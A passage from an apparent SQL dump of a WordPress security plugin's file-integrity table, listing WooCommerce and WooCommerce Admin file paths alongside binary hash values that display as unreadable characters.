@_L\0S','',0,'?'),('?nBֽ-Q@<','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ItopInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',JDũ','8}+{3{9\nBx=\'0','',0,'?'),('kk\0A7%MJ','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/JoomlaInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0fHpg!NO\'','ߓ2ns?AN\ng;','',0,'?'),('VQ^_`3j','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/KanboardInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*3]<]\'','нrt}Q7@I=}amu(Q','',0,'?'),('+݂U:5\'$F','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/KirbyInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(J_?+4h','	<?~C2B ?','',0,'?'),('}u5jg]u9','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/KodiCMSInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X_c\'xM9','`S,wD9kC\05β19jB[','',0,'?'),('_􊜷]]','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/KohanaInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z \"I/','\"[&Pz>|֪!HX1b','',0,'?'),('.8yʞɥ0Ny','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/LanManagementSystemInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pf9O6{l','X>>2򽿉=I̱FҁKŝl\"','',0,'?'),('JB<}c	8/Z&','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/LaravelInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=`w26d','6ŷWh	0W?ޝYǝm','',0,'?'),('\\L4t/','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/LavaLiteInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s@4	\ZDw','+Yv2\ZBP@bHIe4M','',0,'?'),('Zـ2B','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/LithiumInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!{hȡR2˪퀨6','(1qKCD?~Ԩ~OT $&~#>','',0,'?'),('1p=qlfv$wi','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MODULEWorkInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٢j@\nN','pv$L΋,*ʸ/;R˥','',0,'?'),('EuUsvb~,','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MODXEvoInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Ќ~^F','(o8@.z۹	\n!q66bp}','',0,'?'),('j?q8Dte\Zo','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MagentoInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Fs','CfjI\0QnmJI*','',0,'?'),('fA{^S=d','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MajimaInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XU+4]\nj2` ','s)Wg>\0vw@Ceц','',0,'?'),('\"m44	SG','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MakoInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6gO5| ','pns#dF$W͕(Q76','',0,'?'),('_,.u#\n\'#\09T','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MauticInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';y%poѨ','_/y1R%+a-DY6	,,','',0,'?'),('_K\\:d~W?','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MayaInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\0p	f/l:',')_TM\"4\0ٜ(','',0,'?'),('7_Fv','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MediaWikiInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d3ͮ%.Y','\n &<j}J̌vn^wo[','',0,'?'),('6g[_M','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MicroweberInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hf6}2wdq',':a2>`ά%]_ųX','',0,'?'),('sj<+\nϼ','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ModxInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DMR{iPc','&w\"<?Hf>\ZR1%B','',0,'?'),('\"#0\\:#0','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/MoodleInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QI.w>','FЏ\ZGcF-o|[4^e','',0,'?'),('6IG̦','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/OctoberInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\n8u','!|\'n{ML;vO1','',0,'?'),('>xOtW(','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/OntoWikiInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0R$|~\nv','kipE0mŗ1tMFeZ\nRR','',0,'?'),('\rF|Xœ','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/OsclassInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H\'Hyr\n','ߓK4e߂S]n','',0,'?'),('W.a','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/OxidInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KE6P\0I6','U=^k\\p\'}4֌&dtfhU3[','',0,'?'),('Dv%VF4','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PPIInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mĎ妁\r\"Bx~','PL`\'R<DJU>1D,','',0,'?'),('oAHz\0','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PhiftyInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jB8','er5EdH?\ZaARd','',0,'?'),('VT}bTr(','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PhpBBInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','},S=T8','ъcY25%=dt}~^?','',0,'?'),('V	2(','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PimcoreInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';J;`ƒ nH','\r~$#,[5gtW]I{8r(','',0,'?'),('`f>bXz/t','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PiwikInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u̎#!?5','pi=z+#8=n~}','',0,'?'),('YdP\'\"!','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PlentymarketsInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ź>pҸ]T:','lO|TKf.`~4,XvIt','',0,'?');
INSERT INTO `wpxb_wffilemods` VALUES ('ݞT#AzA','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/Plugin.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y9:<ﳽйS','δ:v%Ȟ#{GBWG','',0,'?'),('M\'s1I)/Þx','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PortoInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`	={`F\ZG7','c6y )Sq![dkm','',0,'?'),('NE }ޘ','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PrestashopInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!Hh','9.YlSAXNo*bl','',0,'?'),('js8i<>>u','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PuppetInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bUyͅ\08','bSx\\hT/[ĭux+)D+n<','',0,'?'),(' |{\"d>\nc','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/PxcmsInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0v-T8','i;Hʳ=wRm:@6C|Q	,','',0,'?'),('Y-W\"5','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/RadPHPInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\"	\r{9q+E^[','Ol]%$RCombTr>\ZG','',0,'?'),('LЊtƳێq{B','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ReIndexInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OÝY,\\-\Z*','V#|q1Vׁ-(#خ3-','',0,'?'),('蓇)\r:+(Sy,0','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/RedaxoInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F[|.1x	&XfN','Dm1%nݛ_dr \rJ3Tr','',0,'?'),('a&7W\'','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/RoundcubeInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lcc*~j=p*u','<&J#s\\.,G$lt<IW5','',0,'?'),('.8\0/6>ɴ','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/SMFInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I0mj@0%U','{{o]vrlSaXrPΓ?%.E','',0,'?'),('hP+\0GtMբ','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ShopwareInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KKyޫpr]','\Z\n=I#Z\\4l֙u`','',0,'?'),('[y\06Z','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/SilverStripeInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P-^03͙5','>-且T	1&047lT','',0,'?'),('f+S6j','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/SiteDirectInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y6oz/C','e׺k+oC @ƹOK<hS_','',0,'?'),('Tb-a,?m','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/SyDESInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W}B=H','jPG\ruDc=p\Ztzm6=','',0,'?'),('dnih','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/Symfony1Installer.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LQ\09mM','|3,Ux`i@?f.@F/x}h#','',0,'?'),('D5s*/F','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/TYPO3CmsInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OEeZYE&','WsGr(Q9A_©>+\'','',0,'?'),('yz)\\+B','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/TYPO3FlowInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',oFD:N4','jKbʍy,`y5ofڮ_e','',0,'?'),('êC-Z$L6T','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/TheliaInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R#tXɃt}7FI7','1xk_,_{p\'-Zʻ','',0,'?'),('T2ޞlT','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/TuskInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\\L뺵\'Q','0&MsԎ̩c|	av','',0,'?'),('@z_^','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/UserFrostingInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bмzֵ_','V-2޸<n{s?IݸW>fs(','',0,'?'),('xn\'W$ur','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/VanillaInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$c63>nM\"','d1ޙGp#\\3f\'.','',0,'?'),('sX=SLV','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/VgmcpInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zr>U<z1xe','2LY6[Sj@K#','',0,'?'),('	(gJvt','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/WHMCSInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':x+x[',';C`wWJ-_>79','',0,'?'),('\0Doژ\"7f','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/WolfCMSInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LĜLȐr4r','\r&s3H)CN)1\nJ','',0,'?'),('\Zd7U&','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/WordPressInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՁU3ҾPm','oa/jnuFX]S{u','',0,'?'),('p_0IJ3','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/YawikInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UR)}g)vWs','QT@k\"!9Ca','',0,'?'),('2-Îkeb','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ZendInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<TW<l0ӵ','ۡ-ON~*_>g<','',0,'?'),('%#+seBZ@','wp-content/plugins/woocommerce/vendor/composer/installers/src/Composer/Installers/ZikulaInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K8Idpo?E','T!H	ؘ,Ca~KOPJ9','',0,'?'),('N{g','wp-content/plugins/woocommerce/vendor/composer/installers/src/bootstrap.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɲ\n%\0','g&AgpI84\ZBj','',0,'?'),('pklS','wp-content/plugins/woocommerce-admin/dist/app/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\";w<?','M$өeUO+M刁d%','',0,'?'),('_v姙pd','wp-content/plugins/woocommerce-admin/dist/app/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MKALsX$3','Be0%`\"]eQB%','',0,'?'),('m(1dwC','wp-content/plugins/woocommerce-admin/dist/app/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7^M','@fMbbPk6](VpA','',0,'?'),(']*qt[y7','wp-content/plugins/woocommerce-admin/dist/components/ie-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߌDe7e','ЍM4x\')٠O&^C	\'S','',0,'?'),('q\03U\"\0','wp-content/plugins/woocommerce-admin/dist/components/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߌDe7e','ЍM4x\')٠O&^C	\'S','',0,'?'),('<E?cҾ(','wp-content/plugins/woocommerce-admin/dist/components/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԧfV?a܄M','*^]>h_o-we\Z/w(j','',0,'?'),('wꑕp)}','wp-content/plugins/woocommerce-admin/dist/components/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cYvP!jt','S,r<Z剢RBo0.퉾Ume','',0,'?'),('tLJϲ}([vz','wp-content/plugins/woocommerce-admin/dist/components/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\\\'=EkE)','ȃ74m8AtВa]o#','',0,'?'),('!\nS+*','wp-content/plugins/woocommerce-admin/dist/csv-export/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6=k@1\nc','Js`lZ\nAG₻2̸p_u#	','',0,'?'),('\"t\\pfY','wp-content/plugins/woocommerce-admin/dist/currency/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3bɰWQ4','`Waީc<oO3:M+','',0,'?'),('$m7)4uSn','wp-content/plugins/woocommerce-admin/dist/date/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3۰','uVz)oO@0!RZ$\Z\\\r~fJRZ','',0,'?'),('7候5','wp-content/plugins/woocommerce-admin/dist/embedded/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yq,]%}W','~D9jfдɁS/\0+','',0,'?'),('֎UO\r0b5','wp-content/plugins/woocommerce-admin/dist/embedded/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':z2O)zr%','2Q(cI1.2&MJeShn','',0,'?'),('i4 (~=H','wp-content/plugins/woocommerce-admin/dist/embedded/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8e⇙c','zڙ\'9S$Ǽ\"f65t','',0,'?'),(']%׽ҝP˂','wp-content/plugins/woocommerce-admin/dist/navigation/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\' ņ^;s','Ymza^nUdA]`K\'I','',0,'?'),('aGHJ2d*','wp-content/plugins/woocommerce-admin/dist/number/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ON&4hζ','N	KEl\nXCSR','',0,'?'),('zOa4`<کF','wp-content/plugins/woocommerce-admin/images/empty-content.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZrM\0yNv+','YeZ;7?X	qQt$','',0,'?'),('`\Z,s\'ek~','wp-content/plugins/woocommerce-admin/images/onboarding/facebook.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']\\Es}','Ή)r7;V\\ikPY-Ի','',0,'?'),('0+z0n\nW`','wp-content/plugins/woocommerce-admin/images/onboarding/mailchimp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 6q_@Z','Yxxؓx7;B{m)k-tZ','',0,'?'),('ȶ.rË˞','wp-content/plugins/woocommerce-admin/includes/connect-existing-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8DcP\0i(?','*Jիch&iB2_oB?tR1','',0,'?'),('ہl/{eW:','wp-content/plugins/woocommerce-admin/includes/core-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ø%a\n]','X俙N6OGU!eS͏','',0,'?'),('/I!d.F','wp-content/plugins/woocommerce-admin/includes/feature-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dB\"sNn','vI)c/\\=8(^N','',0,'?'),('X6)\0\0S','wp-content/plugins/woocommerce-admin/includes/page-controller-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';7޶`c@ENpz','!G&Э-z>$EsczE','',0,'?'),('DQK;ԧZYF','wp-content/plugins/woocommerce-admin/languages/woocommerce-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Cg ','Vy`A8el??;\Zs6!8{','',0,'?'),('29^߿+/Ju','wp-content/plugins/woocommerce-admin/languages/woocommerce-admin.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㜢,y9','=AeuPPa־\0t%DALFBIl8','',0,'?'),('I׆jW','wp-content/plugins/woocommerce-admin/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sI7toe&','8dmNW/3S8dnP\Z+AH','',0,'?'),('mC+a,䢐','wp-content/plugins/woocommerce-admin/src/API/Coupons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';`]8Mf)!','Tیӛ!,*zO΍x$','',0,'?'),('ٻM2N9/!','wp-content/plugins/woocommerce-admin/src/API/Customers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')27v:Z','1h;[s1mĉ (hXSWt','',0,'?'),('7$Boɕ.ʔr7[','wp-content/plugins/woocommerce-admin/src/API/Data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gx-\"ϰ','tVj@֏d#(@pHQb{R+{P','',0,'?'),('&gq,LA','wp-content/plugins/woocommerce-admin/src/API/DataCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ef!PyKr0OQ','Ԋy_c#ܾ2lZF!I','',0,'?'),(';\'߱uuM:','wp-content/plugins/woocommerce-admin/src/API/DataDownloadIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ícƴ]','2\ZǾ\Z\08̼XHWHB','',0,'?'),('#Fq0!','wp-content/plugins/woocommerce-admin/src/API/Init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pHYt','s?\'Y:\\6ǬURO]s`HJ5','',0,'?'),('4L\'+i<$\ZIkD','wp-content/plugins/woocommerce-admin/src/API/Leaderboards.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̆y\"4m3w','O<Ovuw]koXk?A|\'i҅|','',0,'?'),(']zM','wp-content/plugins/woocommerce-admin/src/API/NoteActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','of՞;o','I3T\rFZmz$q#g]Bry ','',0,'?'),('_L]7,R^','wp-content/plugins/woocommerce-admin/src/API/Notes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cz	)WGcR>','k,O1/T\\zB','',0,'?'),('7S˦','wp-content/plugins/woocommerce-admin/src/API/OnboardingLevels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\").$֝','E9\"X:ۑ5rC\\G͊A^','',0,'?'),('*y]Ie5W\n\r(','wp-content/plugins/woocommerce-admin/src/API/OnboardingPlugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=`sF=qyinF','+CM\0`oMUb˭hà','',0,'?'),('Mݳ0yh<','wp-content/plugins/woocommerce-admin/src/API/OnboardingProfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>lpJa','!?|\ZmPEQ\nB/6fL*¢','',0,'?'),('ICCi-sW','wp-content/plugins/woocommerce-admin/src/API/Orders.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oֱ\0n=p(','\'ǁjwZ#&{AHબBOZ','',0,'?'),('Wx\r,lcU@P~','wp-content/plugins/woocommerce-admin/src/API/ProductCategories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pߧ+ybrB','}H\ZJNE	5\r;Xo','',0,'?'),('G+.yգJ&.<7','wp-content/plugins/woocommerce-admin/src/API/ProductReviews.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y!q[a\"\'C=','e}UÌsmwe/)֚[ro=OF','',0,'?'),('L\\kAW\0N','wp-content/plugins/woocommerce-admin/src/API/ProductVariations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K$}\r\n','>|]ewpՄOV_5,\ZdL','',0,'?'),('o-\0n!^&','wp-content/plugins/woocommerce-admin/src/API/Products.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nwk~N%7','=k#%^AR\Z]Уm','',0,'?'),('Nqe%}','wp-content/plugins/woocommerce-admin/src/API/Reports/Categories/Controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T@kClo','{K~t\Z9G陊HUZΦ','',0,'?'),('?Չ˿	','wp-content/plugins/woocommerce-admin/src/API/Reports/Categories/DataStore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0wPC','^دw12Y\rU?zsI]0*J>©','',0,'?'),('T/U2wbHbqF','wp-content/plugins/woocommerce-admin/src/API/Reports/Categories/Query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}^Bd즀X$Gv','gʮK]hK{Z%heT|v','',0,'?'),('ר@͉#|VSf','wp-content/plugins/woocommerce-admin/src/API/Reports/Controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4o۾ݜ1TBߑT','b7Jmdm\"Ăqi΀N','',0,'?'),('-լoH&6','wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R(VAQ!','5zIp(uށȐ4OjJ#','',0,'?'),('^r[=&0Pa','wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/DataStore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%TL\'R M\Z','8T2kuѺ+0\"S|ܫ?:A','',0,'?'),('mGd$6:','wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4y,{\Z[J@','c\"C::Z>E\'\ZI	Fo','',0,'?'),('Cpe$?Q','wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Stats/Controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cJb7\'','}Y1K]OIHSc6I','',0,'?'),('6X*kTv','wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Stats/DataStore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','،5ZfJZ','m\0v/p[R<=-ķܟfcek','',0,'?'),('\Z+^SZ]6\0','wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Stats/Query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[vsr','ﻬԞ؎ͭ[gUoŧׂ','',0,'?'),(';l:\\i`?BTn4','wp-content/plugins/woocommerce-admin/src/API/Reports/Coupons/Stats/Segmenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BS]ɮ','D\n2<Mj{:QTRCֆ','',0,'?'),('\'Жwdzk5Jm','wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/Controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̖b{7ڳI]','h\'(wJ(IJ[G7= ;jip','',0,'?'),('sRyWj뱲I','wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/DataStore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2o4@`|','RS⇭+SGV\0>_$	pʄ','',0,'?'),('\Zjr\0D3V','wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/Query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tCPN','<e^af~\0㶹8D$߾F','',0,'?'),('$*.r0F=Tx','wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/Stats/Controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\\\ru[_eYL|','n݄\0L13A3h >S','',0,'?'),('8hN-','wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/Stats/DataStore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ьasq0','MHy<e..?F','',0,'?'),('hFLP^','wp-content/plugins/woocommerce-admin/src/API/Reports/Customers/Stats/Query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wLC7|B*=','oTygq)2C>2v','',0,'?'),('d;Ӧ\r7','wp-content/plugins/woocommerce-admin/src/API/Reports/DataStore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eϚ!&','EdB5e&%e@)\\)JN<ɋB','',0,'?'),('Q_ϟ$~H	,','wp-content/plugins/woocommerce-admin/src/API/Reports/DataStoreInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Uv#G\ry2ħk','x8ÉQv1dƲ-}Z+','',0,'?'),('Pɾxs;F+7','wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/Controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sJt5v6JX','⟝\n\\Aq>cB_\nlA	Γ','',0,'?'),('Lai$/xg\\~U^','wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/DataStore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o(xl\"1d','W_0k̷x°K/v9ړňû','',0,'?'),('C[GnU`(&R9','wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/Files/Controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7C$S\"8	','M̆q=ٔ/GSK\0A;fkS','',0,'?'),('xZN6','wp-content/plugins/woocommerce-admin/src/API/Reports/Downloads/Query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lx%1Ԁ','3%5?:tyE+*szx	nV','',0,'?'),('G<7